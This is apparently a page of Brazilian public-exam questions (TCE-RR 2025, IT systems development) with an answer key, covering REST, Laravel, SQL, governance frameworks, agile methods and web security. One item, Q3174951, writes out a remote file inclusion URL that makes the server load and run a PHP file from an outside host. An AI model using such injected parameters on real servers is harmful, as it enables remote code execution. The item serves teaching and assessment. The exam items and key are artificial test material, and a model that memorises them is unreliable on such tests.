Questões de Concurso Público TCE-RR 2025 para Analista Administrativo - Tecnologia da Informação, com especialidade em Desenvolvimento de Sistemas

Foram encontradas 80 questões

Q3174937 Arquitetura de Software
Assinale a opção que representa uma tecnologia com as seguintes características: arquitetura formada por recursos, servidores e clientes, comunicação stateless, armazenamento em cache, uniformidade de interface e código sob demanda.
Alternativas
Q3174938 Programação
No framework Laravel, há uma ferramenta que é uma implementação mínima e simples de diversos recursos de autenticação, tais como login, cadastro, redefinição de senha e verificação de e-mail. Além disso, a camada de visualização é, por padrão, composta de simples templates Blade estilizados com Tailwind CSS.
O recurso do Laravel descrito acima é o
Alternativas
Q3174939 Banco de Dados
Relacione as etapas de modelagem lógica e física de banco de dados às afirmativas a elas associadas
1. Modelagem Lógica. 2. Modelagem Física.
( ) É dependente do SGBD. ( ) Tem foco maior nas entidades e relacionamentos. ( ) Utiliza tipos de dados genéricos ou abstratos. ( ) Considera itens de desempenho tais como índices, particionamento, etc.
A relação correta, na ordem apresentada, é
Alternativas
Q3174940 Banco de Dados
Assinale a opção que contém apenas comandos da linguagem de criação de dados (DDL – Data Definition Language). 
Alternativas
Q3174941 Banco de Dados
Alguns Sistemas de Gerenciamento de Bancos de Dados (SGBDs) mais antigos ou especializados não suportam múltiplos valores diretamente no INSERT e requerem abordagens alternativas como loops ou vários comandos separados.
Dos SGBDs listados a seguir, o que suporta múltiplos valores no INSERT desde suas versões iniciais é o
Alternativas
Q3174942 Governança de TI
No contexto de Sistemas de Controle Interno em Sistemas de Informação, é fundamental alinhar a implementação de controles automatizados (logs de auditoria, permissões, autenticação entre outros) às normas reconhecidas, como COSO (Committee of Sponsoring Organizations of the Treadway Commission) e COBIT (Control Objectives for Information and Related Technologies), para garantir a eficácia e a conformidade das operações.
Assinale a afirmativa correta acerca da aplicação desses controles segundo as normas mencionadas.
Alternativas
Q3174943 Banco de Dados
No contexto de auditoria e compliance, a pilha ELK Stack (Elasticsearch, Logstash e Kibana) é amplamente usada para analisar e monitorar atividades nos sistemas, especialmente no que se refere à integridade e à segurança de dados.
Sobre as funcionalidades dessa pilha, assinale a afirmativa correta.
Alternativas
Q3174944 Arquitetura de Software
O Zabbix é uma solução open source de monitoramento distribuído. É um software que monitora vários parâmetros de dispositivos de rede e a saúde e integridade de servidores, sistemas e aplicações. A arquitetura Zabbix possui diversos componentes, cada um com uma função específica.
O componente responsável por fazer a coleta de dados sobre disponibilidade e integridade de sistemas de TI em clientes em uma rede remota é o 
Alternativas
Q3174945 Programação
Angular, React e Vue.js são poderosas ferramentas para o desenvolvimento de interfaces de usuários Single Page Applications e sistemas robustos. Elas apresentam, porém, diferentes abordagens.
Diante desse cenário, avalie as afirmativas a seguir e assinale (V) para a verdadeira e (F) para a falsa.

( ) Nuxt é um dos principais frameworks baseados em Angular.
( ) Uma característica do React é o emprego de JSX - extensão de sintaxe que permite escrever marcações semelhantes à HTML em um arquivo JavaScript.
( ) Mantido pelo Google, o Vue.js é baseado em TypeScript e no padrão MVC.


As afirmativas são, respectivamente,
Alternativas
Q3174946 Programação
Um bom desenvolvedor de sistemas deve ter conhecimento sobre refatoração, padrões de arquitetura e de projeto, princípios SOLID e outros tópicos importantes sobre programação. Em relação a padrões de projeto, considere o seguinte trecho de código:


Imagem associada para resolução da questão


Marque a opção que corresponde ao padrão de projeto implementado no código acima.
Alternativas
Q3174947 Programação
No ecossistema JavaScript existe uma ferramenta que atua como um compilador, permitindo utilizar funcionalidades recentes da linguagem (ex: async/await, classes, arrow functions e JSX), convertendo código ECMAScript 2015+ em uma versão compatível com navegadores mais antigos. Tal ferramenta é denominada
Alternativas
Q3174948 Segurança da Informação
Analistas do TCE-RR utilizavam uma plataforma web interna para registrar auditorias. Durante a análise de segurança, foi detectado que áreas de entrada de texto na plataforma, usadas para registrar observações em relatórios, continham código malicioso armazenado no servidor.
Esse código era executado automaticamente no navegador de qualquer funcionário que visualizasse os relatórios, redirecionando-os para sites fraudulentos.
Nesse contexto, o ataque foi identificado como
Alternativas
Q3174949 Direito Digital
A Lei Geral de Proteção de Dados (LGPD) estabelece uma série de princípios a ser observados durante o desenvolvimento de sistemas que tratam dados pessoais. Esses princípios têm como objetivo garantir a proteção e a privacidade dos dados, assim como a transparência no seu tratamento.
Nesse sentido, de acordo com os princípios da LGPD aplicados ao desenvolvimento de sistemas, é correto afirmar que
Alternativas
Q3174950 Segurança da Informação
Durante uma auditoria no setor de TI de TCE-RR, foi constatado que os analistas estavam utilizando criptografia por chave pública para o envio de informações confidenciais. Para garantir que os dados sejam protegidos contra acessos não autorizados, cada servidor precisa configurar corretamente as chaves de criptografia antes de iniciar a troca de mensagens.
Com base no funcionamento da criptografia assimétrica, sobre o processo de envio de uma mensagem criptografada é correto afirmar que
Alternativas
Q3174951 Segurança da Informação
A página web da sociedade empresária Exemplo1234, disponível na internet, permite que internautas acessem o edital de uma vaga de trabalho por meio do endereço eletrônico http://empresa1234.com/vaga.php?file=vaga.pdf.
Durante a verificação de vulnerabilidades contratada por essa empresa, foi observado que o servidor da página web da Empresa1234 processava o valor fornecido no parâmetro file sem realizar validação ou sanitização adequada.
Como resultado, foi possível incluir e executar no servidor o conteúdo de um arquivo malicioso hospedado no endereço http://testevulnerabilidade.com/badpage.php
O teste foi realizado utilizando o seguinte endereço:
http://empresa1234.com/vaga.php?file=http://testevulnerabilida de.com/badpage.php
Ao acessar essa URL, o conteúdo do arquivo badpage.php foi carregado e executado diretamente pelo servidor da Empresa1234, comprometendo sua segurança.
O tipo de vulnerabilidade presente no servidor de página da Empresa1234 é o 
Alternativas
Q3174952 Redes de Computadores
O Burp Suite é uma ferramenta amplamente utilizada para testes de segurança em aplicações web, oferecendo funcionalidades como interceptação de tráfego, análise de vulnerabilidades e automação de ataques.
Em relação às ferramentas presentes na ferramenta Burp Suite, analise as afirmativas a seguir.

I. O proxy do Burp Suite pode interceptar o tráfego HTTP e HTTPS entre o cliente e o servidor, permitindo analisar e manipular requisições em tempo real; ele é essencial para identificar vulnerabilidades em parâmetros, cabeçalhos e cookies.

II. O Repeater é uma ferramenta do Burp Suite para realizar ataques automatizados, como brute force e fuzzing, permitindo testar vulnerabilidades em parâmetros de entrada.

III. O Intruder é usado para enviar requisições manualmente, permitindo ajustar parâmetros e repetir testes de vulnerabilidades com base em respostas anteriores; sua interface exibe claramente a requisição enviada e a resposta recebida, facilitando a análise e a validação de falhas.

Está correto o que se afirma em
Alternativas
Q3174953 Banco de Dados
No planejamento e ao controle de projetos, uma prática avançada para garantir o alinhamento entre a execução do projeto e os objetivos estratégicos da organização é
Alternativas
Q3174954 Engenharia de Software
As metodologias ágeis promovem flexibilidade, colaboração e entrega incremental, adaptando-se rapidamente às mudanças em diversos tipos de trabalho. Elas utilizam práticas para organizar tarefas, visualizar o fluxo de trabalho e garantir qualidade contínua.
Nesse sentido, correlacione as metodologias ágeis apresentadas a seguir com suas respectivas descrições.
1. Scrum 2. Kanban 3. XP(Extreme Programming)

( ) Método focado na gestão do fluxo contínuo de trabalho, utilizando um quadro visual para representar as etapas do trabalho, promovendo a visualização das tarefas em diferentes estágios e a limitação do trabalho em andamento.

( ) Metodologia que enfatiza a excelência técnica através da adoção de práticas específicas que visam a alta qualidade do processo de trabalho e do produto final, como revisões frequentes, feedback constante e foco na melhoria contínua do processo.

( ) Framework que define papéis e eventos específicos para a gestão do trabalho em equipe, estruturado em iterações curtas (sprints) com objetivos definidos, buscando entregas incrementais de valor e a adaptação contínua ao contexto, com foco na gestão do projeto como um todo.

Assinale a opção que indica a relação correta, na ordem apresentada.
Alternativas
Q3174955 Governança de TI
No contexto da gestão de serviços de TI, analise as afirmativas a seguir.

I. Em ambientes que seguem frameworks como ITIL, práticas de compliance devem ser tratadas separadamente dos processos de gerenciamento de serviços, para evitar atrasos nas auditorias internas e externas.

II. Auditorias de TI devem ser realizadas exclusivamente para verificar a conformidade com normas e regulamentações, sem impacto direto na melhoria dos processos de gerenciamento de incidentes e mudanças.

III. A realização de auditorias sistemáticas pode reduzir falhas de conformidade ao identificar e monitorar indicadores críticos em tempo real, permitindo ações corretivas alinhadas a padrões regulatórios.



Está correto o que se afirma em
Alternativas
Q3174956 Governança de TI
Os princípios de governança de TI envolvem a definição de processos e estruturas para garantir que a tecnologia da informação seja usada de forma eficiente, alinhada aos objetivos de negócios e à gestão adequada de riscos.
Com relação ao assunto analise as afirmativas a seguir:

I. O COBIT é um framework de governança de TI que foca no alinhamento de TI com os objetivos de negócios, garantindo a entrega de valor e a mitigação de riscos.

II. O ITIL é uma metodologia que descreve práticas de gerenciamento de serviços de TI, com ênfase na entrega eficiente e eficaz de serviços ao cliente, sem considerar a gestão de riscos.

III. O COBIT e o ITIL são frameworks complementares, ambos focados na governança de TI, sendo o COBIT mais voltado para o controle e o ITIL, para a gestão de serviços.


Está correto o que se afirma em 
Alternativas
Respostas
61: D
62: C
63: C
64: B
65: D
66: B
67: E
68: A
69: C
70: B
71: E
72: C
73: B
74: B
75: D
76: A
77: E
78: C
79: C
80: B